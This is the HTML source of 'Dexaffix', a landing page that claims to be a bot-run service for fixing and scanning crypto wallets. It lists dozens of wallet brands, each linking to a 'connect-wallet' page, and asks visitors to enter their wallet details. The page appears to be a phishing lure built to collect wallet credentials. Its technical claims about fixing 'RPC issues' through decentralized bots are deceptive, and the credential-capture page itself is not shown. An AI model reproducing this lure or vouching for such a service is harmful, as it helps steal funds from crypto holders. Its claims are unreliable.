<!DOCTYPE html>
<html lang="en">
<head>
	<title>Dexaffix</title>
	<meta charset="UTF-8">
	<meta name="description" content="Dexaffix is a decentralized automatic network service provider run by bots">
	<meta name="keywords" content="cryptocurrency, Dexaffix, creative">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<!-- Favicon -->
	<link href="favicon.ico" rel="shortcut icon"/>

	<!-- Google Fonts -->
	<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet">

	<!-- Stylesheets -->
	<link rel="stylesheet" href="css/bootstrap.min.css"/>
	<link rel="stylesheet" href="css/font-awesome.min.css"/>
	<link rel="stylesheet" href="css/themify-icons.css"/>
	<link rel="stylesheet" href="css/animate.css"/>
	<link rel="stylesheet" href="css/owl.carousel.css"/>
	<link rel="stylesheet" href="css/style.css"/>
	<link rel="stylesheet" href="css/main.css" type="text/css"> 
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

	<script>
        function show() {
          var x = document.getElementById("hidden");
          if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }

        if (x.style.display === "block") {
            document.getElementById("btn").innerHTML = "Show Less &uarr;";
        } else {
            document.getElementById("btun").innerHTML = "Show More &darr;"
        }
    }
</script>


	<!--[if lt IE 9]>
	  <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
	  <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
	<![endif]-->

</head>
<body>
	<!-- Page Preloder -->
	<div id="preloder">
		<div class="loader"></div>
	</div>

	<!-- Header section -->
	<header class="header-section clearfix">
		<div class="container-fluid">
			<a href="/" class="site-logo">
				<img src="img/logo.png" alt="">
			</a>
			<div class="responsive-bar"><i class="fa fa-bars"></i></div>
			<!-- <a href="#wallets" class="site-btn">Fix wallet</a> -->
			<nav class="main-menu">
				<ul class="menu-list">
					<li><a href="#wallets">Fix wallet</a></li>
					<li><a href="scan-wallet">Scan wallet</a></li>
					<li><a href="#how-it-works">How it works</a></li>
					<li><a href="#news">News</a></li>
				</ul>
			</nav>
		</div>
	</header>
	<!-- Header section end -->


	<!-- Hero section -->
	<section class="hero-section">
		<div class="container">
			<div class="row">
				<div class="col-md-6 hero-text">
					<h2>Facing Issues <span> With Wallet</span> <br></h2>
					<h4>Dexaffix is a decentralized automatic network service provider run by bots. It’s a  remote protocols that interact with wallet providers which fix RPC issues of the network. </h4>
					&nbsp;
					<h4>Dexaffix scan service filter out all connected site the wallet has interacted with and gives the user the opportunity to disconnects any unsecured site connected to the wallet. </h4>
				    &nbsp;
					<h5 style="color: white;">Fast and secured automated service provider all details are encrypted and service are carried out by bots.</h5>
				</div>
				<div class="col-md-6">
					<img src="img/laptop.png" class="laptop-image" alt="">
				</div>
			</div>
		</div>
	</section>
	<!-- Hero section end -->

	<!-- Process section -->
	<section class="process-section spad">
		<div class="container" id="how-it-works">
			<div class="section-title text-center">
				<h2>How to fix your wallet</h2>
				<p>It’s fun, easy, and takes only a few minutes! </p>
			</div>
			<div class="row">
				<div class="col-md-4 process">
					<div class="process-step">
						<figure class="process-icon">
							<img src="img/process-icons/1.png" alt="#">
						</figure>
						<h4>Select Wallet</h4>
						<p>Click Fix Wallet Button on the top right or scroll down to select your crypto wallet. <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<p hidden>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p><p hidden>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p><p hidden>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p><p hidden>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p></p></p>
						
					</div>
				</div>
				<div class="col-md-4 process">
					<div class="process-step">
						<figure class="process-icon">
							<img src="img/process-icons/2.png" alt="#">
						</figure>
						<h4>Add wallet</h4>
						<p>Add your wallet required details. For easy trouble shooting of wallet problem. Our cloud infrastructure connects over thousands of wallet providers</p>
					</div>
				</div>
				<div class="col-md-4 process">
					<div class="process-step">
						<figure class="process-icon">
							<img src="img/process-icons/3.png" alt="#">
						</figure>
						<h4>Wallet Problem Fixed</h4>
						<p>Automated bot will review you wallet details in  seconds and navigate to the wallet provider then the wallet will be fixed.</p>
					</div>
				</div>
			</div>
		</div>
	</section>
	<!-- Process section end -->

	<!-- Team section -->
	<section class="team-section spad">
		<div class="container" id="wallets">
			<div class="section-title text-center">
				<h2>Connect Wallet</h2>
				<!-- i will still change this writeup -->
				<p>By connecting your wallet to Dexaffix, we can trouble shoot the issues with the wallet.</p>
			</div>
		</div>
		<div class="container">
		<div class="all">
			<div class="apps">
				<a href="connect-wallet?w=metamask"><img src="assets/metamask.png"></a><br>
				MetaMask
			</div>

			<div class="apps">
				<a href="connect-wallet?w=MEW+wallet"><img src="assets/MEW.png"></a><br>
				MEW Wallet
			</div>

			<div class="apps">
				<a href="connect-wallet?w=trust+wallet"><img src="assets/trustwallet.png"></a><br>
				Trust Wallet
			</div>

			<div class="apps">
				<a href="connect-wallet?w=wallet+connect"><img src="assets/logo.svg"></a><br>
				Wallect<br>Connect
			</div>

			<div class="apps">
				<a href="connect-wallet?w=coinbase+wallet"><img src="assets/coinbase.jpg"></a><br>
				Coinbase Wallet
			</div>

			<div class="apps">
				<a href="connect-wallet?w=atomic+wallet"><img src="assets/atomic.png"></a><br>
				Atomic Wallet
			</div>

			<div class="apps">
				<a href="connect-wallet?w=binance+smart+chain"><img src="assets/binance.png"></a><br>
				Binance Smart Chain
			</div>

			<div class="apps">
				<a href="connect-wallet?w=phantom"><img src="assets/phantom.png"></a><br>
				Phantom
			</div>

			<div class="apps">
				<a href="connect-wallet?w=nami"><img src="assets/nami.jpg"></a><br>
				Nami
			</div>

			<div class="apps">
				<a href="connect-wallet?w=telos"><img src="assets/telos.jpg"></a><br>
				Telos
			</div>

			<div class="apps">
				<a href="connect-wallet?w=yoroi+wallet"><img src="assets/yoroi-wallet.jpg"></a><br>
				Yoroi
			</div>

			<div class="apps">
				<a href="connect-wallet?w=polkadot"><img src="assets/polkadot.png"></a><br>
				Polkadot
			</div>

			<div class="apps">
				<a href="connect-wallet?w=avalanche"><img src="assets/avalanche.png"></a><br>
				Avalanche
			</div>

			<div class="apps">
				<a href="connect-wallet?w=coinomi"><img src="assets/coinomi.png"></a><br>
				Coinomi
			</div>

			<div class="apps">
				<a href="connect-wallet?w=sollet"><img src="assets/sollet.png"></a><br>
				Sollet
			</div>

			<div class="apps">
				<a href="connect-wallet?w=xrp"><img src="assets/xrp.png"></a><br>
				XRP
			</div>

			<div class="apps">
				<a href="connect-wallet?w=stellar"><img src="assets/stellar.png"></a><br>
				Stellar
			</div>

			<div class="apps">
				<a href="connect-wallet?w=tezos"><img src="assets/tezos.png"></a><br>
				Tezos
			</div>

			<div class="apps">
				<a href="connect-wallet?w=theta"><img src="assets/theta.png"></a><br>
				Theta
			</div>

			<div class="apps">
				<a href="connect-wallet?w=tron"><img src="assets/tron.png"></a><br>
				Tron
			</div>

			<div class="apps">
				<a href="connect-wallet?w=cosmos"><img src="assets/cosmos.png"></a><br>
				Cosmos
			</div>

			<div class="apps">
				<a href="connect-wallet?w=kava"><img src="assets/kava.png"></a><br>
				Kava
			</div>

			<div class="apps">
				<a href="connect-wallet?w=filecoin"><img src="assets/filecoin.png"></a><br>
				Filecoin
			</div>


			<div class="apps">
				<a href="connect-wallet?w=ethereum+classic"><img src="assets/ethereum-classic.png"></a><br>
				Ethereum Classic
			</div>

			<div class="apps">
				<a href="connect-wallet?w=zilliqa"><img src="assets/zilliqa.png"></a><br>
				Zilliqa
			</div>

			<div class="apps">
				<a href="connect-wallet?w=elrond"><img src="assets/elrond.jpg"></a><br>
				Elrond
			</div>

			<div class="apps">
				<a href="connect-wallet?w=waves"><img src="assets/waves.png"></a><br>
				Waves
			</div>

			<div class="apps">
				<a href="connect-wallet?w=icon"><img src="assets/icon.png"></a><br>
				ICON
			</div>

			<div class="apps">
				<a href="connect-wallet?w=ontology"><img src="assets/ontology.png"></a><br>
				Ontology
			</div>


			<div class="apps">
				<a href="connect-wallet?w=trust+vault"><img src="assets/parsiq.jpg"></a><br>
				Parsiq
			</div>

			

			<!-- <div class="apps">
				<a href="connect-wallet?w=unifarm"><img src="assets/unifarm.jpg"></a><br>
				Unifarm
			</div> -->
			<div class="apps">
				<a href="connect-wallet?w=lunchpool"><img src="assets/lunchpool.jpg"></a><br>
				LunchPool
			</div>
			<div class="apps">
				<a href="connect-wallet?w=scale"><img src="assets/scale.jpg"></a><br>
				Scale
			</div>
			<div class="apps">
				<a href="connect-wallet?w=swapp"><img src="assets/swapp.jpg"></a><br>
				Swapp
			</div>
			<div class="apps">
				<a href="connect-wallet?w=paid"><img src="assets/paid.jpg"></a><br>
				Paid
			</div>
			<div class="apps">
				<a href="connect-wallet?w=adapad"><img src="assets/adapad.jpg"></a><br>
				Adapad
			</div>
			<div class="apps">
				<a href="connect-wallet?w=anypad"><img src="assets/anypad.jpg"></a><br>
				Anypad
			</div>
			<div class="apps">
				<a href="connect-wallet?w=nearpad"><img src="assets/nearpad.jpg"></a><br>
				NearPad
			</div>
		</div>
		<br>
		<center><button onclick="show()" class="btn" id="btn">Show More ↓</button></center>
		<br><br>
		<div class="hidden" id="hidden">
			<div class="all">

				<div class="apps">
					<a href="connect-wallet?w=nano"><img src="assets/nano.png"></a><br>
					Nano
				</div>

				<div class="apps">
					<a href="connect-wallet?w=tomo+chain"><img src="assets/tomo.png"></a><br>
					Tomo Chain
				</div>

				<div class="apps">
					<a href="connect-wallet?w=iotex"><img src="assets/iotex.png"></a><br>
					IoTex
				</div>

				<div class="apps">
					<a href="connect-wallet?w=wanchain"><img src="assets/wanchain.png"></a><br>
					Wanchain
				</div>

				<div class="apps">
					<a href="connect-wallet?w=kin"><img src="assets/kin.png"></a><br>
					Kin
				</div>

				<div class="apps">
					<a href="connect-wallet?w=nimiq"><img src="assets/nimiq.png"></a><br>
					Nimiq
				</div>

				<div class="apps">
					<a href="connect-wallet?w=aion"><img src="assets/aion.png"></a><br>
					Aion
				</div>

				<div class="apps">
					<a href="connect-wallet?w=thunder-token"><img src="assets/thundertoken.png"></a><br>
					Thunder Token
				</div>

				<div class="apps">
					<a href="connect-wallet?w=aerternity"><img src="assets/aeternity.png"></a><br>
					Aeternity
				</div>

				<div class="apps">
					<a href="connect-wallet?w=nebulas"><img src="assets/nebulas.png"></a><br>
					Nebulas
				</div>

				<div class="apps">
					<a href="connect-wallet?w=fio"><img src="assets/fio.png"></a><br>
					FIO
				</div>

				<div class="apps">
					<a href="connect-wallet?w=gochain"><img src="assets/gochain.png"></a><br>
					GoChain
				</div>

				<div class="apps">
					<a href="connect-wallet?w=POA+network"><img src="assets/poa.png"></a><br>
					POA Network
				</div>

				<div class="apps">
					<a href="connect-wallet?w=callisto"><img src="assets/callisto.png"></a><br>
					Callisto
				</div>

				<div class="apps">
					<a href="connect-wallet?w=bitpay"><img src="assets/bitpay.jpg"></a><br>
					BitPay
				</div>

				<div class="apps">
					<a href="connect-wallet?w=aktionariat"><img src="assets/aktionariat.png"></a><br>
					Aktionariat
				</div>

				<div class="apps">
					<a href="connect-wallet?w=atwallet"><img src="assets/atwallet.png"></a><br>
					AtWallet
				</div>

				<div class="apps">
					<a href="connect-wallet?w=guard+wallet"><img src="assets/guard.png"></a><br>
					Guard Wallet
				</div>

				<div class="apps">
					<a href="connect-wallet?w=aave"><img src="assets/aave.jpg"></a><br>
					AAVE
				</div>

				<div class="apps">
					<a href="connect-wallet?w=exodus"><img src="assets/exodus.jpg"></a><br>
					Exodus
				</div>


				<div class="apps">
					<a href="connect-wallet?w=enjin"><img src="assets/enjin.jpg"></a><br>
					Enjin
				</div>


				<div class="apps">
					<a href="connect-wallet?w=skale"><img src="assets/skale.png"></a><br>
					Skale
				</div>

				<div class="apps">
					<a href="connect-wallet?w=portis"><img src="assets/portis.png"></a><br>
					Portis
				</div>

				<div class="apps">
					<a href="connect-wallet?w=trezor"><img src="assets/trezor.png"></a><br>
					Trezor
				</div>

				<div class="apps">
					<a href="connect-wallet?w=squarelink"><img src="assets/squarelink.png"></a><br>
					Squarelink
				</div>

				<div class="apps">
					<a href="connect-wallet?w=torus"><img src="assets/torus.jpg"></a><br>
					Torus
				</div>

				<!-- <div class="apps">
					<a href="connect-wallet?w=vechain"><img src="assets/vechain.jpg"></a><br>
					VeChain
				</div> -->

				<div class="apps">
					<a href="connect-wallet?w=scatter+wallet"><img src="assets/scatter.jpg"></a><br>
					Scatter Wallet
				</div>

				<div class="apps">
					<a href="connect-wallet?w=math+wallet"><img src="assets/math-wallet.png"></a><br>
					Math Wallet
				</div>

				<div class="apps">
					<a href="connect-wallet?w=fortmatic"><img src="assets/fortmatic.png"></a><br>
					FortMatic
				</div>

				<div class="apps">
					<a href="connect-wallet?w=digitex"><img src="assets/digitex.png"></a><br>
					Digitex
				</div>

				<div class="apps">
					<a href="connect-wallet?w=ledger"><img src="assets/ledger.png"></a><br>
					Ledger
				</div>

				<div class="apps">
					<a href="connect-wallet?w=defiat"><img src="assets/defiat.jpg"></a><br>
					Defiat
				</div>

				<div class="apps">
					<a href="connect-wallet?w=authereum"><img src="assets/authereum.png"></a><br>
					Authereum
				</div>

				<div class="apps">
					<a href="connect-wallet?w=flare+wallet"><img src="assets/flare.jpg"></a><br>
					Flare Wallet
				</div>

				<div class="apps">
					<a href="connect-wallet?w=zelcore"><img src="assets/zelcore.png"></a><br>
					Zelcore
				</div>

				<div class="apps">
					<a href="connect-wallet?w=bitkeep"><img src="assets/bitkeep.png"></a><br>
					BitKeep
				</div>

				<div class="apps">
					<a href="connect-wallet?w=coin98"><img src="assets/coin98.png"></a><br>
					Coin98
				</div>

				<div class="apps">
					<a href="connect-wallet?w=trust+vault"><img src="assets/trustvault.png"></a><br>
					Trust Vault
				</div>
				<div class="apps">
					<a href="connect-wallet?w=terra+station"><img src="assets/terra.png"></a><br>
					Terra Station
				</div>
				<div class="apps">
					<a href="connect-wallet?w=polka+wallet"><img src="assets/polka.jpg"></a><br>
					Polka Wallet
				</div>
				<div class="apps">
					<a href="connect-wallet?w=safepal+wallet"><img src="assets/safepal.png"></a><br>
					Safepal
				</div>
				<div class="apps">
					<a href="connect-wallet?w=ronin+wallet"><img src="assets/ronin.jpg"></a><br>
					Ronin
				</div>
				<div class="apps">
					<a href="connect-wallet?w=fantom+wallet"><img src="assets/fantom.png"></a><br>
					Fantom
				</div>
				<div class="apps">
					<a href="connect-wallet?w=cosmostation+wallet"><img src="assets/cosmostation.png"></a><br>
					Cosmostation
				</div>
			</div>
		</div>
	</div>

		
	</section>
	<!-- Team section -->

	<!-- Newsletter section -->
	<section class="newsletter-section gradient-bg">
		<div class="container text-white" id="contact">
			<div class="row">
				<div class="col-lg-7 newsletter-text">
					<h2>Subscribe to our Newsletter</h2>
					<p>Sign up for our weekly crypto updates, insider perspectives and common wallet problems.</p>
				</div>
				<div class="col-lg-5 col-md-8 offset-lg-0 offset-md-2">
					<form class="newsletter-form">
						<input type="text" placeholder="Enter your email">
						<button>Get Started</button>
					</form>
				</div>
			</div>
		</div>
	</section>
	<!-- Newsletter section end -->


	<!-- Blog section -->
	<section class="blog-section spad">
		<div class="container" id="news">
			<div class="section-title text-center">
				<h2>Latest News</h2>
			</div>
			<div class="row">
				<!-- blog item -->
				<div class="col-md-4">
					<div class="blog-item">
						<figure class="blog-thumb">
							<img src="img/blog/new1.png" alt="">
						</figure>
						<div class="blog-text">
							<div class="post-date">6 March 2022</div>
							<h4 class="blog-title"><a href="https://cointelegraph.com/news/solana-tvl-and-price-drop-50-from-ath-but-gaming-dapps-could-turn-the-tables" target="_blank">Solana TVL and price drop 50%+ from ATH, but gaming DApps could turn the tables</a></h4>
							<div class="post-meta">
								<a href=""><span>by</span> Admin</a>
								<a href=""><i class="fa fa-heart-o"></i> 305 Likes</a>
								<a href=""><i class="fa fa-comments-o"></i> 90 comments</a>
							</div>
						</div>
					</div>
				</div>
				<!-- blog item -->
				<div class="col-md-4">
					<div class="blog-item">
						<figure class="blog-thumb">
							<img src="img/blog/new2.png" alt="">
						</figure>
						<div class="blog-text">
							<div class="post-date">6 March 2022</div>
							<h4 class="blog-title"><a href="https://www.coindesk.com/policy/2022/03/05/visa-mastercard-join-paypal-in-suspending-russian-operations/?utm_medium=referral&utm_source=rss&utm_campaign=headlines" target="_blank">The payment processors cited Russia's invasion of Ukraine in announcing the move on Saturday.</a></h4>
							<div class="post-meta">
								<a href=""><span>by</span> Admin</a>
								<a href=""><i class="fa fa-heart-o"></i> 289 Likes</a>
								<a href=""><i class="fa fa-comments-o"></i> 79 comments</a>
							</div>
						</div>
					</div>
				</div>
				<!-- blog item -->
				<div class="col-md-4">
					<div class="blog-item">
						<figure class="blog-thumb">
							<img src="img/blog/new3.png" alt="">
						</figure>
						<div class="blog-text">
							<div class="post-date">6 March 2022</div>
							<h4 class="blog-title"><a href="https://cointelegraph.com/news/the-post-consortia-era-how-enterprises-are-embracing-web3-structures" target="_blank">The post-consortia era: How enterprises are embracing Web3 structures
							</a></h4>
							<div class="post-meta">
								<a href=""><span>by</span> Admin</a>
								<a href=""><i class="fa fa-heart-o"></i> 234 Likes</a>
								<a href=""><i class="fa fa-comments-o"></i> 67 comments</a>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</section>
	<!-- Blog section end -->




	<!-- Footer section -->
	<footer class="footer-section">
		<div class="container">
			<div class="row spad">
				<div class="col-md-6 col-lg-3 footer-widget">
					<img src="img/logo.png" class="mb-4" alt="">
					<span><!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
Copyright &copy;<script>document.write(new Date().getFullYear());</script> All rights reserved <i class="fa fa-heart-o" aria-hidden="true"></i><a href="/" target="_blank"></a>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. --></span>
				</div>
				<div class="col-md-6 col-lg-2 offset-lg-1 footer-widget">
					<h5 class="widget-title">Resources</h5>
					<ul>
						<li><a href="#">Faq</a></li>
						<li><a href="#">Wallet Overview</a></li>
						<li><a href="#news">Blog News</a></li>
						<li><a href="https://www.wikihow.com/Make-a-Wallet#:~:text=1%20Cut%20out%20a%20paper%20pattern%20for%20your,stitch%20to%20sew%20the%20wallet%20body%20in%20half." target="_blank">How to Create your own wallet</a></li>
					</ul>
				</div>
				<div class="col-md-6 col-lg-2 offset-lg-1 footer-widget">
					<h5 class="widget-title">Quick Links</h5>
					<ul>
						<li><a href="https://www.coinbase.com/learn/crypto-basics/what-is-a-crypto-wallet" target="_blank">What is a crypto wallet</a></li>
						<li><a href="#">Wallet Provider</a></li>
						<li><a href="#">Governance</a></li>
						<li><a href="https://coinmarketcap.com/rankings/exchanges/" target="_blank">Exchange Markets</a></li>
					</ul>
				</div>
			</div>
			<div class="footer-bottom">
				<div class="row">
					<div class="col-lg-8 text-center text-lg-right">
						<ul class="footer-nav">
							<li><a href="">DPA</a></li>
							<li><a href="">Terms of Use</a></li>
							<li><a href="">Privacy Policy </a></li>
							<li><a href="">support@Dexaffix.com</a></li>
						</ul>
					</div>
				</div>
			</div>
		</div>
	</footer>


	<!--====== Javascripts & Jquery ======-->
	<script src="js/jquery-3.2.1.min.js"></script>
	<script src="js/owl.carousel.min.js"></script>
	<script src="js/main.js"></script>
	<script src="js/popup.js"></script>
</body>
</html>
